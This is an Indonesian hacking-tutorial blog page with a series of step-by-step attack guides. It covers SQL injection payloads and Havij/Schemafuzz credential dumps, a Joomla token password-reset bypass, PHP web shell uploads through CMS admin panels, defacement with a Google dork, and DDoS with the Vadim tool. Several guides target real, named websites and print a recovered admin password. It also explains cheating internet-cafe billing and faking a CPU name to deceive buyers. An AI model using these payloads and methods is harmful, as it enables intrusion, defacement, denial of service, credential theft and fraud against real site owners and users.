Tampilkan postingan dengan label Hacking Tutorial. Tampilkan semua postingan
Tampilkan postingan dengan label Hacking Tutorial. Tampilkan semua postingan

Block Situs Porno Tanpa Software

1. Buka drive C:
2. Pilih WINDOWS
3. System32
4. Drivers
5. etc
6. Buka file hosts
7. Masukan link situs yg akan d block dg mengganti IP asli'y
example **
[Image: 04704895336479072538.png]
8. Close & save
untuk test cba bkan situs yg tadi ..walah yg terbuka malah google Big GrinBig Grin
- untuk yg brwarna kuning muda (IP target [redirect] 'kali ini sya menggunakan IP google')
- untuk yg brwarna merah muda (alamat situs yang akan d blok)
Selesai
NOTE : jadi Setiap situs yg tlah kita masukan dihosts otomatis akan me'redirect ke google...^-^
untuk IPadress silahkan terserah kamu mo di redirect kemana ''''
bagus jga di gunakan untuk client diwarnet....biar yg ngenet tidak bisa mengakses site17+ Big Grin
atau bisa juga dengan mendownload file host'y d sini..'dpet link dari sahabat perjuangan'
------------------------------------------------------------------------------------------------------
http://www.4shared.com/get/0MhTfpFS/hosts.html
------------------------------------------------------------------------------------------------------
krang lebih 200 link 17+ site luar/lokal..
klo krang tinggal tambahin z coz ane bkan maniak 17+ jg kgak tau nama situs'y

Selamat mencoba....**
'Rascal_21 a.k.a x3nophobi4'

Hacking Billing With Cheat Engine & Bios Mode


Tutorial Basi tapi semoga za masih berguna....dari sekian banyak cara Bobol billing... mungkin nie cara cupu tapi bagi nyubi kaya ane masih bisa di gunakan klo lagi Kere' Seneng

CheatEngine v5.
install >> load/attach program billing [oo8client] >> speedhack.

TABEL SPEEDHACK
0.1 = 1jam jadi 10 jam
0.2 = 1jam jadi 5 jam
0.3 = 1jam jadi 3.33jam
0.4 = 1jam jadi 2.5 jam
0.5 = 1jam jadi 2 jam
1.0 = 1jam jadi ya 1jam


/
With Bios Mode

Pertama : Buka Bios ,pas boot pertama tekan delete tergantung vers BIOSx.

Kedua :
Trus cari setingan tanggal dan waktu d bios.

Ketiga : Mundurin jamnya 'n' menitnya (jangan dimajuin nanti tambah mahal n9akak ) Tp Jangan Gratissssszzzzz juga n9akak ......nanti bisa di dor sama server warnet.....n9akak

Keempat : Restart dan selesai....

Note : Usahakan bwat kepentingan mendesak z ^_^

-' Regards '-
- Rascal_21 @ Pandeglang Wannabe Hacker

Tutorial - Hacking Web Menggunakan Havij

Author : Rascal_21
Pandeglang Hacker Team

Download Tools

------------------------------
STEP 1 Inject Url Target
------------------------------
Masukan Url target di coloums paling atas lalu klik Analize


Lihat coloums pling bawah untuk mengetahui Vuln target & jumlah coloumn
pastekan url di browser dengan jumlah coloumn yang ada di Havij
teknik yang di gunakan disini (SQL injection ) untuk mencari username & password
contoh :
http://www.arenabola.com/?page=artikel&id=9+AND+1=2+union+select+1,2,3,group_concat(user,0x3a,pass),5,6,7,8,9,10,11,12+from+admin--

----------------------------------------------------------------------
STEP 2 Menghash Password apabila masih berbentuk MD5
------------------------------------------------------------------------
Pilih MD5 & masukan password yang akan d hash...lalu klik Start
Password akan di hash secara online oleh havij di 15 Situs Hash password
Hasil
----------------------------------------
STEP 3 Mencari Halaman admin
----------------------------------------
Msukan url target lalu pilih Find Admin

Alhamdulillah user/password dan halaman admin sudah ketemu....tinggal di upload shell'y .....
Ry klo ada yang salah - masih newbie Grin
Semoga bermanfaat Grin

Tutorial - DDOS Menggunakan Vadim

Sebelum'y pahami dulu arti'y, Serangan DOS.
Silahkan dibaca dulu pengertian'y --> http://id.wikipedia.org/wiki/Serangan_DoS

Step yang dilakukan dalam melakukan serangan Ddos:
1. Connect ke korban (host, port).
2. Kirimkan paket data dalam jumlah besar.
3. koneksi terputus > selesai.

Sebenar'y masih banyak tekhnik DDOS ATTACK.
tapi Yang akan ane bahas disini adalah Ddos dengan menggunakan shell dengan VADIM Sebagai senjata untuk menyerang.

Langkah Pertama :

Langkah Kedua :
Upload Vadim yg dagh di donlot tadi ke Shell kalian. Kalo belum punya shell. silahkan minta ke temen.
Shell hrs dlm keadaan safemode Off, chmod'y permissionnya disetting 777 artinya kita mampu melakukan aksi baca, tulis dan eksekusi terhadap file tersebut.

Langkah Ketiga :
Ekstrak file Vadim menggunakan perintah --> tar -zxvf vadim.tar.gz Klik go
Screenshoot'y kek gini :














Setelah di ekstrak, nanti akan tercipta sebuah folder nama folder'y --> [Dos]. Setelah itu Klik folder tersebut. Kita masuk ke directory'y.

Langkah Keempat :
Setelah semua'y siap, ketik ini -->./vadimI [iptarget] [port] [jumlah paket]

Contoh : 111.111.111.111 80 9999999999999999999999 Klik go
Screenshoot :















Selanjut'y Klik go, and Kita tunggu hasil'y.

Thank To Patriot


SOURCE

Hacking Video Tutorial

Silahkan didownload video'y ^_^
Bila ada password : al_bantani
---------------------------------------------------------------------
---------------------------------------------------------------------
Hacking Video Tutorial - Phpmyadmin
http://www.4shared.com/file/pz7Ozrjr/phpmyadmin.html
---------------------------------------------------------------------
---------------------------------------------------------------------
Hacking Video Tutorial - Cpanel Hacking
http://www.4shared.com/file/G3pXG06c/C_p4nel.html
---------------------------------------------------------------------
---------------------------------------------------------------------
Hacking Video Tutorial - Brute Force
http://www.4shared.com/file/NT-NDbjs/tutoraccountBruteForce.html
---------------------------------------------------------------------
---------------------------------------------------------------------
Hacking Video Tutorial - Joomla Reset Password
http://www.4shared.com/file/MIecxKVa/joomla_reset_pass.html
---------------------------------------------------------------------
---------------------------------------------------------------------
Hacking Video Tutorial - RFI Metode + Patch
http://www.4shared.com/file/Ov_3yd9W/RFI_Patc.html
---------------------------------------------------------------------
---------------------------------------------------------------------
Hacking Video Tutorial - LFI (Local file disclosure)
http://www.4shared.com/file/jSmkcNrR/L_F_I.html
---------------------------------------------------------------------
---------------------------------------------------------------------
Hacking Video Tutorial - Sqli Backdoring
http://www.4shared.com/file/8mmHwxxW/SQLi_B4CKd0r.html
---------------------------------------------------------------------
---------------------------------------------------------------------
Hacking Video Tutorial - Deface HTML
http://www.4shared.com/file/hkxQik5C/DefacHTML-Injec.html
---------------------------------------------------------------------
---------------------------------------------------------------------
Hacking Video Tutorial - Sqli V.4
http://www.4shared.com/file/IBQ-RZU1/S-v4.html
---------------------------------------------------------------------
---------------------------------------------------------------------
Hacking Video Tutorial - Sqli V.5
http://www.4shared.com/document/K4_kSuXf/Tutorial_SQL_Injection.html
---------------------------------------------------------------------
---------------------------------------------------------------------
Hacking Video Tutorial - Jumping
http://www.4shared.com/file/Agmx67u5/JumP_N4ck0.html
---------------------------------------------------------------------
---------------------------------------------------------------------
Hacking Video Tutorial - Metasploit
http://www.4shared.com/file/fx87EhEY/tutor_metas.html
---------------------------------------------------------------------
---------------------------------------------------------------------
Hacking Video Tutorial - Rooting
http://www.4shared.com/file/Z7YF5ahj/R00tin9.html
---------------------------------------------------------------------
---------------------------------------------------------------------
Hacking Video Tutorial - Asp Sql inj_TUTOR
http://www.4shared.com/file/X60x9df6/asp-sql-inj_TUTOR.html
---------------------------------------------------------------------
---------------------------------------------------------------------
Hacking Video Tutorial - Scemafuzzy
http://www.4shared.com/file/FDOJKC3d/Scema.html
---------------------------------------------------------------------
---------------------------------------------------------------------
Hacking Video Tutorial - Backdoring + Inject + Deface
http://www.4shared.com/file/QMSTE8zc/_2__BackInjectDef.html
---------------------------------------------------------------------
---------------------------------------------------------------------
Hacking Video Tutorial - Sqli Malingsial Version
http://www.4shared.com/file/xfy-al-Q/Malingsial.html
---------------------------------------------------------------------
---------------------------------------------------------------------
Hacking Video Tutorial - Patching Joomla
http://www.4shared.com/file/a_GUfnkm/joomla_patch.html
---------------------------------------------------------------------
---------------------------------------------------------------------
Hacking Video Tutorial - Defacing Tutorial
http://www.4shared.com/file/Hu4IxoNG/Defac-Tutor.html
---------------------------------------------------------------------
---------------------------------------------------------------------
Thank To : All indonesian hacker and defacer


ENJOY DEFACING AND HACKING

Tutorial - Hack With Token

------------------------
Tutorial Hack With Token

---------------------------
Nah mungkin semua udah pada ngerti tentang hack atau deface web dengan tekhnik Token
kali ini saya menjelaskan sedikit tekhnik token tersebut.

pertama cari search engine yang menurut kalian bagus,,kali ini pke tante google yah.
terus ketik di searchnya
inurl:option=com_user daerah / negara tujuan = daerah tujuan terderah kalian disini saya menggunakan inurl:option=com_user singapura
atau inurl:option=com_user site:.sg
setelah itu cari target yang akan kalian coba masuki,contohnya ini

http://www.mumcentre.com/index.php?option=com_user&task=register

lalu ganti seperti ni

option=com_user&view=reset&layout=confirm

maka URL akan menjadi seperti ini
http://www.mumcentre.com/index.php?option=com_user&view=reset&layout=confirm

setelah URl itu kita klik maka akan muncul apa yang namanay token,,.
apa yang harus kalian lakukan..??
yang harus kalian lakukan adalah memasukan karakter single quote (`) pada token tersebut..!!

jika kalain berhasil mengakses menu buat reset password tersebut,,maka masukan password sesuka hati kalian (apa aja deh)..
setelah itu akan keluar suskes dari ganti password tersebut..

Nah kali ini kalian akan,mencari hal login dari ste tersebut..

stelah ketemu maka login lah kalian dengan usernae admin terus passwordnya dengan password yang kalian isikan tadi.
jika beruntung maka kalian akan bisa mengakses hal admin dari web tersebut.
terserah kalian mau apa z terhadap web tersebut karena kalian jadi admin dari web tersebut..

Thank To bobyhikaru.

Cara Upload Shell

Mungkin ada kendala yah setelah takeover web lewat bug sqli, kita cuma dapet akses ke panel admin, berbahagialah kalo cmsnya ada fitus upload gambar, hehehe kendalanya cuma upload gambar, upload php? ini gunanya tutorial ini

Jika cms target Joomla

anda dapat mengubah file yang dapat di upload di media pada settingan di Global Configuration di tab system tambah ekstensi php kemudian save. Setelah itu upload shell anda di media manajemen. shell anda akan berada pada direktori site.name/images/namaphpshellnya.php

Jika cms target WordPress

anda dapat mengupload BD dengan cara mengkompres dahulu phpshell anda ke dalam format *.zip , kemudian add new plugins , pilih upload , upload phpshell.zip anda, file tersebut akan berada pada direktori site.nama/wp-content/plugins/namafolderzipnya/namaphpshellnya.php

Jika cms target cms biasa / selain diatas

anda dapat mengupload phpshell anda di bagian dimana terdapat form upload picture, sebelumnya ubah dulu ekstensi phpshell anda menjadi namashell.php.jpg atau dengan null byte menjadi: namashell.php.jpg

Jika cms tidak menerima upload shell dengan nullbyte

Pakai aplikasi kecil bernama edjpgcom, aplikasi ini bisa menulis suatu skrip kedalam sebuah file gambar

DOWNLOAD:

http://www.chapelhill.homeip.net/horton/copies/edjpgcom/edjpgcom.zip

lalu diekstrak, saya sarankan diekstrak di C: (C:\edjpgcom.exe)

Cara memakainya, buka command prompt, lalu arahkan (ganti current directory) ke C:\

sebelum itu, siapkan file gambarnya, dan taruh di C:\ juga misal: gambar.jpg

kembali ke command prompt, ketik “edjpgcom.exe gambar.jpg” (tanpa tanda kutip pastinya) ntar ada keuar form, nah, tinggal masukkan skrip kalian lalu OK

Sekarang file anda sudah ada skripnya

Sekian dulu dari saya

Thanks to: r3m1ck dan zee_eichel dari Tecon

SOURCE

Tutorial - Simple Defacing ^-^

Simple Defacing :) Tutorial
sebelum kegiatan alangkah baik'y berdoa dolo
ok langsung z ke Tkp ^-^

Dork = allinurl:"/cgi-bin/ourspace
exploid = /cgi-bin/ourspace/newswire/uploadmedia.cgi

- Buka google = masukan dork tadi
- Example target : http://www.israelbego.com/cgi-bin/ourspace//login.cgi
- Hapus /cgi-bin/ourspace//login.cgi
- & kemudian ganti dengan Exploit
- Jadi : http://www.israelbego.com/cgi-bin/ourspace/newswire/uploadmedia.cgi
- Enter dah tu Url (abrakadabraaaaaa...)

Wihh gi beruntung nih ente d beri akses upload file tanpa harus login ^-^.....
skarang upload file Html kamu (H4ck By _ _ _ _)

Enjoy defacing

Mengganti Nama Processor

Lansung z gan..^-^

Ini bisa digunakan jika ingin mengelabui seseorang agar mengira komputer anda adalah Pentium 4, padahal komputer anda adalah pentium 2 atau 3. (biasax sich penjual komputer seken yg nakal….)

Caranya sebagai berikut :
1. Masuk ke registry editor anda ( Start –> Run –> Ketik regedit )
2. Masuk ke registry berikut
HKEY_LOCAL_MACHINE\HARDWARE\DISCRIPTION\System\CentralProcessor\
atau
HKEY_LOCAL_MACHINE\HARDWARE\DISCRIPTION\System\CentralProcessor\0\
atau
HKEY_LOCAL_MACHINE\HARDWARE\DISCRIPTION\System\CentralProcessor\1\
3. Cari key dengan nama “ProcessorNameString” ( kalo ga ada nama tsb yaa pake ‘find’)
4. Klik kanan key tersebut lalu pilih Modify dan ubah Value Data tersebut sesuai keinginan (Contoh : Intel Pentium 4).

Cma pembelajaran jngan terlalu sring d pake bwat nipu org.... :P


Thanx to - IHT

SQL Injection Dengan SchemaFuzzy

Author : Andr3^81
e-Mail : andr3-81[at]linuxmail[dot]org

Schemafuzz.py dibuat dengan menggunakan bahasa python oleh rsauron[@]gmail[dot]com dari situs darkc0de, tujuannya untuk memudahkan para SQL injector menemukan tabel dan kolom pada database sql yang dipenetrasi.

ok untuk tidak berpanjang lebar lagi mari kita perhatikan dengan seksama langkah-langkah berikut

pertama-tama kita cari target dengan google dan ditemukan:

misalnya

http://127.0.0.1/site/phpweb/forum.php?forum=1

sebelum kita melangkah lebih lanjut perlu kita ketahui apa saja perintah yang harus digunakan.

caranya seperti ini ./schemafuzz.py -h help

kita temukan sebagian perintahnya seperti ini

–schema, –dbs, –dump, –fuzz, –info, –full, –findcol

langkah pertama

./schemafuzz.py-u"http://127.0.0.1/site/phpweb/forum.php?forum=1″ –findcol

diperoleh seperti ini

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1–

[+] Evasion Used: “+” “–”

[+]01:32:04

[+]Proxy Not Given

[+]Attempting To find the number of columns…

[+]Testing: 0,1,2,3,4,5,

[+]Column Length is: 6

[+]Found null column at column#:1

[+]SQLiURL: http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,1,2,3,4,5–

[+]darkc0deURL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5

[-] Done!

langkah kedua

————–

setelah ketemu kita masukkan copy yang darkc0de URL jadi seperti ini

./schemafuzz.py-u“http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5″–fuzz

diperoleh seperti ini

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5–

[+] Evasion Used: “+” “–”

[+] 01:37:09

[+] Proxy Not Given

[+] Gathering MySQL Server Configuration…

Database: webthings

User: testing@localhost

Version: 5.0.51a

[+] Number of tables names to be fuzzed: 354

[+] Number of column names to be fuzzed: 263

[+] Searching for tables and columns…

[+] Found a table called: mysql.user

[+] Now searching for columns inside table “mysql.user”

[!] Found a column called:user

[!] Found a column called:password

[-] Done searching inside table “mysql.user” for columns!

[-] [01:37:48]

[-] Total URL Requests 618

[-] Done

langkah ketiga

Setelah kita temukan nama databasenya trus kita lanjutkan kelangkah berikutnya

./schemafuzz.py-u“http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5″-schema -D namadatabasenya

./schemafuzz.py -u“http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5″-schema -D webthings

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5–

[+] Evasion Used: “+” “–”

[+] 01:43:11

[+] Proxy Not Given

[+] Gathering MySQL Server Configuration…

Database: webthings

User: testing@localhost

Version: 5.0.51a

[+] Showing Tables & Columns from database “webthings”

[+] Number of Tables: 33

[Database]: webthings

[Table: Columns]

[0]wt_articles: cod,article_id,subtitle,page,text,text_ori,htmlarticle,views

[1]wt_articles_title: article_id,category,title,active,date,userid,views

[2]wt_articlescat: cod,category

[3]wt_banners: cod,name,active,image,url_image,url,code,views,clicks,periode,start_date,end_date

[4]wt_banners_log: banner,date,views,clicks,sessions

[5]wt_banners_rawlog: banner,type,date,session

[6]wt_centerboxes: cod,pos,active,oneverypage,menuoption,title,content,file,type,draw_box

[7]wt_comments: cod,type,link,date,userid,comment

[8]wt_config: id,config

[9]wt_downloads: id,category,name,active,url,date,size,count,rate_sum,rate_count,

short_description,description,small_picture,big_picture,

author_name,author_email,comments,url_screenshot,license,license_text

[10]wt_downloadscat: cod,ref,name,descr

[11]wt_faq: cod,topic,uid,active,question_ori,question,answer_ori,answer

[12]wt_faq_topics: cod,name

[13]wt_forum_log_topics: uid,msgid,logtime,notifysent

[14]wt_forum_msgs: cod,forum,msg_ref,date,userid,title,text_ori,date_der,

views,closed,sticky,modifiedtime,modifiedname,notifies

[15]wt_forums: cod,title,descr,locked,notifies,register

[16]wt_forums_mod: forum,userid,type

[17]wt_guestbook: id,datum,naam,email,homepage,plaats,tekst

[18]wt_links: id,category,active,name,url,count,descr,obs

[19]wt_linkscat: cod,name,descr,parent_id

[20]wt_menu: id,pos,title,url,type,newwindow,lang

[21]wt_news: cod,lang,category,catimgpos,date,title,userid,image,align,active,

counter,text,text_ori,full_text,full_text_ori,archived,sidebox,

sideboxtitle,sideboxpos

[22]wt_newscat: cod,name,image

[23]wt_online: id,time,uid

[24]wt_picofday: id,category,userid,small_picture,big_picture,description,full_description,views,clicks

[25]wt_picofdaycat: id,name,description

[26]wt_picofdaysel: date,picture_id,views,clicks

[27]wt_polls: cod,dtstart,dtend,question,item01,item02,item03,item04,item05,item06,item07,

item08,item09,item10,count01,count02,count03,count04,count05,count06,count07,

count08,count09,count10

[28]wt_sideboxes: cod,pos,side,active,title,content,file,type,function,modules

[29]wt_user_access: userid,module

[30]wt_user_book: userid,cod_user

[31]wt_user_msgs: cod,userid,folder,date,user_from,title,msg_read,text,notify

[32]wt_users: uid,name,password,class,realname,email,question1,

question2,url,receivenews,receiverel,country,city,state,icq,aim,sex,session,

active,comments,newsposted,commentsposted,faqposted,topicsposted,dateregistered,

dateactivated,lastvisit,logins,newemail,newemailsess,avatar,lang,theme,signature,banned,msn,showemail

[-] [01:43:48]

[-] Total URL Requests 270

[-] Done

untuk mengetahui apakah kita bisa load_file dalam site tersebut gunakan perintah ini

./schemafuzz.py-u“http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5″ –info

maka akan tampil seperti ini

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5–

[+] Evasion Used: “+” “–”

[+] 01:46:51

[+] Proxy Not Given

[+] Gathering MySQL Server Configuration…

Database: webthings

User: testing@localhost

Version: 5.0.51a

[+] Do we have Access to MySQL Database: Yes <– w00t w00t

http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,concat(user,0×3a,password),2,3,4,5

+FROM+mysql.user–

[+] Do we have Access to Load_File: No

[-] [01:46:51]

[-] Total URL Requests 3

[-] Done

ternyata kita gak bisa load_file tapi bisa mengakses ke database mysqlnya hehehe

untuk mengetahui beberapa database yang terdapat pada site tersebut, kita gunakan perintah seperti ini

./schemafuzz.py-u“http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5″ –dbs

akan tampil seperti ini

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5–

[+] Evasion Used: “+” “–”

[+] 01:58:15

[+] Proxy Not Given

[+] Gathering MySQL Server Configuration…

Database: webthings

User: testing@localhost

Version: 5.0.51a

[+] Showing all databases current user has access too!

[+] Number of Databases: 1

[0] webthings

[-] [01:58:17]

[-] Total URL Requests 30

[-] Done

langkah selanjutnya

——————–

cara untuk menemukan user dan password

kita gunakan perintah –dump-D namadatabase -T namatabel -C namakolom

setelah kita menemukan nama database, nama tabel dan kolom tinggal kita masukkan perintah seperti ini

./schemafuzz.py-u“http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5″–dump-D webthing -T wt_users -C name,password

eing ing eng….

jreennnng….keluar deh user ama passwordnya

hasilnya dibawah ini

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5–

[+] Evasion Used: “+” “–”

[+] 02:08:47

[+] Proxy Not Given

[+] Gathering MySQL Server Configuration…

Database: webthings

User: testing@localhost

Version: 5.0.51a

[+] Dumping data from database “webthings” Table “wt_users”

[+] Column(s) ['name','password']

[+] Number of Rows: 2

[0] admin:e00b29d5b34c3f78df09d45921c9ec47:

[1] user:098f6bcd4621d373cade4e832627b4f6:

[-] [02:08:48]

[-] Total URL Requests 4

[-] Done

jangan lupa kita selalu mengecek schemafuzzlog.txt nya

setelah itu tinggal kita meng crack passwordnya pake program

gemana rekan2 gampang kan pake schemafuzz

NB:

Langkah diatas sangat mudah digunakan pada MySQL v5 kalau untuk MySQL versi 4 silakan menebak2 tabel ama kolomnya

Ingat kita jgn terlalu dimanjakan dengan program yang siap pakai, sebab kita gak ngerti dasar-dasarnya, asal-usulnya… program tersebut hanya bertujuan untuk membantu kita apabila kita tidak menemukan sesuatu yang muncul dalam site target.

PERHATIAN!!!! jangan merusak, jadikan tutorial ini sebagai pembelajaran bagi para admin maupun yang pengen belajar sql injection serta newbie seperti saya

www.binushacker.net

SQL Injection, Step by Step

By D-and

/*********************************************************
* SQL Injection, step by step.
* No Warranty. This tutorial is for educational use only,
* commercial use is prohibited.
**********************************************************/
Akhir-akhir ini, anda sering mendengar istilah "SQL Injection" ?
Anda tahu betapa berbahaya bug yang satu ini ?
Berikut akan kita sajikan step by step SQL Injection ini.
Catatan : kita akan membatasi bahasan pada SQL Injection
di MS-SQL Server.

Kita akan mengambil contoh di site www.pln-wilkaltim.co.id
Ada dua kelemahan di site ini, yaitu:
1. Tabel News
2. Tabel Admin

Langkah pertama, kita tentukan lubang mana yang bisa di-inject
dengan jalan berjalan-jalan (enumeration) dulu di site tsb.
Kita akan menemukan 2 model cara input parameter, yaitu dengan
cara memasukkan lewat input box dan memasukkannya lewat
alamat URL.

Kita ambil yang termudah dulu, dengan cara input box.
Kemudian kita cari kotak login yang untuk admin.
Ketemu di www.pln-wilkaltim.co.id/sipm/admin/admin.asp
Langkah pertama untuk menentukan nama tabel dan fieldnya,
kita inject kotak NIP dengan perintah (password terserah, cabang
biarkan aja):
' having 1=1--
jangan lupa untuk menuliskan tanda kutip tunggal dan tanda
minus dobel (penting).
Arti kedua tanda tsb bisa anda cari di tutorial SQL Injection
di www.neoteker.or.id ini (lihat arsip sebelumnya).
Kemudian akan keluar pesan error:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.NOMOR' is invalid in the select list because
it is not contained in an aggregate function and
there is no GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
Keluarlah nama field pertama kita !!!
Catat nama tabel : T_ADMIN
Catat nama field : NOMOR

Kemudian kita akan mencari nama field-field berikutnya,
beserta nama tabel yang mungkin berbeda-beda.
Kita inject di kotak NIP (password terserah):
' group by T_ADMIN.NOMOR having 1=1--
Akan keluar pesan error:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.NIP' is invalid in the select list because
it is not contained in either an aggregate
function or the GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
Artinya itulah nama tabel dan field kedua kita.
Catat : T_ADMIN.NIP

Kemudian kita cari field ke tiga :
' group by T_ADMIN.NOMOR,T_ADMIN.NIP having 1=1--
Akan keluar pesan error:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.PASSWORD' is invalid in the select list because
it is not contained in either an aggregate
function or the GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
Catat field ke tiga : T_ADMIN.PASSWORD
Lakukan langkah di atas sampai kita menemukan field terakhir.
Berikut adalah pesan error yang terjadi, jika kita mengecek
field terakhir dengan meng-inject:
' group by T_ADMIN.NOMOR,T_ADMIN.NIP,T_ADMIN.PASSWORD,
T_ADMIN.NAMA,T_ADMIN.KD_RANTING,T_ADMIN.ADDRESS,T_ADMIN.EMAIL
having 1=1--
(catatan : kalimat harus 1 baris, tidak dipotong)
--------------------
- NIP atau Password atau Unit Anda salah !! -
--------------------
Sukses !!! Kita berhasil menemukan field terakhir.
Daftar kolom (field):
T_ADMIN.NOMOR
T_ADMIN.NIP
T_ADMIN.PASSWORD
T_ADMIN.NAMA
T_ADMIN.KD_RANTING
T_ADMIN.ADDRESS
T_ADMIN.EMAIL
Hanya ada satu tabel untuk otentifikasi ini (yaitu T_ADMIN),
ini akan mempermudah proses kita selanjutnya.
Langkah berikutnya, kita menentukan jenis struktur field-
field tersebut di atas.
Kita inject di kotak NIP (pass terserah) :
' union select sum(NOMOR) from T_ADMIN--
Arti dari query tersebut adalah : kita coba menerapkan
klausa sum sebelum menentukan apakah jumlah kolom-kolom
di dua rowsets adalah sejenis.
Bahasa mudahnya adalah kita memasukkan klausa sum (jumlah)
yang berlaku untuk type kolom numerik, jadi untuk type kolom
yang bukan numerik, akan keluar error yang bisa memberitahu
kita jenis kolom yang dimaksud.
Pesan error :
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]All queries
in an SQL statement containing a UNION operator must have
an equal number of expressions in their target lists.
/sipm/admin/dologin.asp, line 7
--------------------
artinya kolom NOMOR berjenis numerik.
Berikutnya kita inject :
' union select sum(NIP) from T_ADMIN--
Akan keluar pesan error :
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum
or average aggregate operation cannot take a char data
type as an argument.
/sipm/admin/dologin.asp, line 7
--------------------
Artinya kolom NIP bertype char.

Kita harus mengulang perintah di atas untuk kolom yang
berikutnya dengan jalan mengganti nama_kolom di :
' union select sum(nama_kolom) from T_ADMIN--
dengan kolom yang berikutnya.
Kita peroleh 7 type kolom:
T_ADMIN.NOMOR => numeric
T_ADMIN.NIP => char
T_ADMIN.PASSWORD => nvarchar
T_ADMIN.NAMA => char
T_ADMIN.KD_RANTING => char
T_ADMIN.ADDRESS => nvarchar
T_ADMIN.EMAIL => char
Langkah berikutnya, kita akan mencari isi kolom password,
untuk user admin, dengan meng-inject :
' union select min(NAMA),1,1,1,1,1,1 from T_ADMIN where NAMA > 'a'--
artinya kita memilih minimum nama user yang lebih besar dari 'a'
dan mencoba meng-konvert-nya ke tipe integer.
Arti angka 1 sebanyak 6 kali itu adalah bahwa kita hanya memilih
kolom NAMA, dan mengabaikan 6 kolom yang lain.
Akan keluar pesan error :
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax
error converting the varchar value 'bill ' to
a column of data type int.
/sipm/admin/dologin.asp, line 7
--------------------
Anda lihat :
varchar value 'bill '
'bill' itu adalah nama user di record yang terakhir dimasukkan,
atau isi kolom NAMA di record yang terakhir dimasukkan.

Selanjutnya kita inject :
' union select min(PASSWORD),1,1,1,1,1,1 from T_ADMIN where
NAMA = 'bill'--
catatan : harus sebaris (tidak dipotong).
Akan keluar error :
---------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax
error converting the nvarchar value 'm@mpusk@u' to a
column of data type int.
/sipm/admin/dologin.asp, line 7
---------------------
Artinya kita berhasil !!!
Kita dapatkan
[+] NAMA = bill
[+] PASSWORD = m@mpusk@u
Silahkan login ke :
www.pln-wilkaltim.co.id/sipm/admin/admin.asp
dengan account di atas, sedang nama cabang, silahkan anda
isi sendiri dengan cara coba-coba

Atau kita pakai jalan pintas saja....

Kita inject-kan :
' union select min(KD_RANTING),1,1,1,1,1,1 from T_ADMIN
where NAMA ='bill'--
catatan : harus satu baris.
Duarrrrrr..........
Glhodhak.............
Langsung masuk ke menu admin.
Ingat : jangan buat kerusakan ! beritahu sang admin !!!

Lubang ke dua adalah pada bagian berita.
Pada dasarnya berita di situ adalah isi dari tabel yang
lain lagi. Jadi tetep bisa kita inject !!!
Bedanya, kita harus memasukkan parameter di alamat URL-nya.
Contoh :
www.pln-wilkaltim.co.id/dari_Media.asp?id=2119&idm=40&idSM=2
ada parameter id dan idSM.
Setelah kita coba inject, ternyata yang berpengaruh adalah
parameter id aja (CMIIW).
Kita inject-kan :
www.pln-wilkaltim.co.id/dari_Media.asp?id=2119' having 1=1--
akan keluar pesan error :
---------------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'tb_news.NewsId' is invalid in the select list because
it is not contained in an aggregate function and
there is no GROUP BY clause.
/dari_Media.asp, line 58
---------------------------
artinya 'tb_news.NewsId' itulah nama tabel dan kolom kita
yang pertama.

Ulangi langkah-langkah kita di atas sampai didapatkan :
tb_news.NewsId => numeric
tb_news.NewsCatId => numeric
tb_news.EntryDate => datetime
tb_news.Title => nvarchar
tb_news.Content =>
tb_news.FotoLink =>
tb_news.FotoType => bit data
tb_news.review =>
tb_news.sumber => char
tb_news.dateagenda => datetime

Nah, selanjutnya adalah tugas anda sendiri untuk mengembangkan
pengetahuan anda.
Anda bisa men-insert berita yang bisa anda tentukan sendiri
isinya.

Inilah mengapa hole di MS-SQL Server ini demikian berbahaya.

Perkiraan saya, nama-nama partai di situs KPU yang di-hack
oleh Shizoprenic, juga ada di tabel-tabel suatu database,
jadi tetep bisa dimasuki dengan cara SQL Injection ini.

******************************************************
